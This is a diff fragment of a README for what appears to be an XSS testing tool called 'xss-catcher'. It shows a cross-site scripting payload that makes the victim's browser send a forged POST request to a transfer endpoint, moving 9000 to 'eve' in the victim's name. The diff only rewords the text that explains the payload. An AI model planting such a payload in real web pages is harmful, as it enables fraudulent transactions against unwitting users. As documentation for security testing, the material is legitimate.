ivan-sincek/xss-catcher/README.md

 <script>var xhr = new XMLHttpRequest(); xhr.open('POST', 'https://target.com/transfer.php', true); xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xhr.send('recipient=eve&amount=9000');</script>
 ```

-Example above will send an HTTP POST request to a target server in the victim's name with user-defined parameters as a form-data.
+Payload above will send an HTTP POST request to a target server in the victim's name with user-defined parameters as a form-data.

 ---